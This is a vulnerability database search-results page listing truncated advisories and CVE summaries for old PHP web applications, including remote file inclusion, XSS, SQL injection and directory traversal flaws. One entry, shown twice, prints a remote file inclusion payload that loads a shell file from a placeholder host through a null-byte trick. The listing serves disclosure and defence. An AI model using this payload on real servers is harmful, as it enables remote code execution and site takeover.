164 matches found
Portail Web PHP 2.5.1 - 'includes.php' Remote File Inclusion
php web portail remote file include download site: https://sourceforge.net/project/showfiles.php?groupid=178400 product:php web portail bug: remote file include risk : high remote file include : /includes/includes.php?sitepath=http://site.com/shell.txt?%00 laurent gaffié http://s-a-p.ca/ contact:...
Portail Web PHP 2.5.1 - includes.php Remote File Inclusion
Portail Web PHP 2.5.1 - includes.php Remote File Inclusion php web portail remote file include download site: https://sourceforge.net/project/showfiles.php?groupid=178400 product:php web portail bug: remote file include risk : high remote file include :...
Slooze PHP Web Photo Album验证绕过漏洞
Slooze PHP Web Photo Album是一款基于PHP的WEB应用程序。 Slooze PHP Web Photo Album不正确过滤用户提交的输入,远程攻击者可以利用漏洞未授权访问应用程序。 问题是由于脚本的验证机制缺少正确处理,攻击者可以提交恶意参数绕过验证,以管理员权限访问应用程序。 Slooze PHP Web Photo Album 0.2.7 目前没有解决方案提供: http://www.slooze.com/...
CVE-2006-5481
Multiple PHP remote file inclusion vulnerabilities in 2le.net Castor PHP Web Builder 1.1.1 allow remote attackers to execute arbitrary PHP code via the rootpath parameter in 1 lib/code.php, 2 lib/dbconnect.php, 3 lib/error.php, 4 lib/menu.php, and other unspecified files. NOTE: the provenance of...
CVE-2005-4013
PHP Web Statistik 1.4 stores the stat.cfg file under the web root with insufficient access control, which allows remote attackers to obtain sensitive information such as statistics and the log directory location, possibly including the logdb.dta file...
CVE-2005-4012
Multiple cross-site scripting XSS vulnerabilities in PHP Web Statistik 1.4 allows remote attackers to inject arbitrary web script or HTML via 1 the lastnumber parameter to stat.php and 2 the HTTP referer to pixel.php...
CVE-2005-4014
stat.php in PHP Web Statistik 1.4 allows remote attackers to cause a denial of service CPU consumption via a large lastnumber value...
CVE-2005-4015
PHP Web Statistik 1.4 does not rotate the log database or limit the size of the referer field, which allows remote attackers to fill the log files via a large number of requests, as demonstrated using pixel.php...
CVE-2005-4012
The CVE-2005-4012 entry describes multiple cross-site scripting (XSS) vulnerabilities in PHP Web Statistik 1.4 . An attacker can inject arbitrary script via (1) the lastnumber parameter to stat.php and (2) the HTTP Referer to pixel.php. The NVD entry lists a Medium base score (4.3) with no authen...
CVE-2005-4013
PHP Web Statistik 1.4 stores the stat.cfg file under the web root with insufficient access control, allowing remote attackers to read sensitive information such as statistics and the log directory location, and possibly the logdb.dta file. Root cause: weak access permissions on stat.cfg exposed v...
CVE-2005-4012
Multiple cross-site scripting XSS vulnerabilities in PHP Web Statistik 1.4 allows remote attackers to inject arbitrary web script or HTML via 1 the lastnumber parameter to stat.php and 2 the HTTP referer to pixel.php...
[Full-disclosure] Php Web Statistik Multiple Vulnerabilities
PHP Web Statistik Multiple Vulnerabilities Name Multiple Vulnerabilities in PHP Web Statistik Systems Affected PHP Web Statistik verified on 1.4 Severity Medium Risk Vendor www.php-web-statistik.de Advisory http://www.ush.it/2005/11/19/php-web-statistik/ Author Francesco ‘aScii’ Ongaro ascii at...
PHP Web Statistik 1.4 - Content Injection
PHP Web Statistik 1.4 - Content Injection source: https://www.securityfocus.com/bid/15603/info PHP Web Statistik is prone to multiple content injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. The vulnerabilities could allow f...
PHP Web Statistik 1.4 - Content Injection
source: https://www.securityfocus.com/bid/15603/info PHP Web Statistik is prone to multiple content injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. The vulnerabilities could allow for HTML injection and cross-site scripting...
Calendar Express Multiple Vulnerabilities (SQLi, XSS)
The remote host is using Calendar Express, a PHP web calendar. Vulnerabilities exist in this version that could allow an attacker to execute arbitrary HTML and script code in the context of the user's browser, and SQL injection. An attacker could exploit these flaws to use the remote host to...
QWikiwiki directory traversal vulnerability
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Title: QWikiwiki directory traversal vulnerability Vulnerability discovery: Madelman madelman AT iname.com Date: 01/01/2005 Severity: Critical Summary: - -------- QwikiWiki is driven by one core design goal: simplicity. This design goal is codified in...
PSNews 1.1 - 'No' Cross-Site Scripting
source: https://www.securityfocus.com/bid/11124/info PSNews is a Web application that is implemented in PHP. PSNews is affected by a cross-site scripting vulnerability. This issue is due to a failure of the application to properly sanitize user-supplied URI input. This vulnerability is reported t...
MercuryBoard < 1.1.6 SQL Injection
Binary data 4510.prm...
SUSE-SA:2002:036: mod_php4
The remote host is missing the patch for the advisory SUSE-SA:2002:036 modphp4. PHP is a well known and widely used web programming language. If a PHP script runs in 'safe mode' several restrictions are applied to it including limits on execution of external programs. An attacker can pass shell...
SUSE-SA:2003:0008: imp
The remote host is missing the patch for the advisory SUSE-SA:2003:0008 imp. IMP is a well known PHP-based web-mail system. Some SQL-injection vulnerabilities were found in IMP 2.x that allow an attacker to access the underlying database. No authentication is needed to exploit this bug. An attack...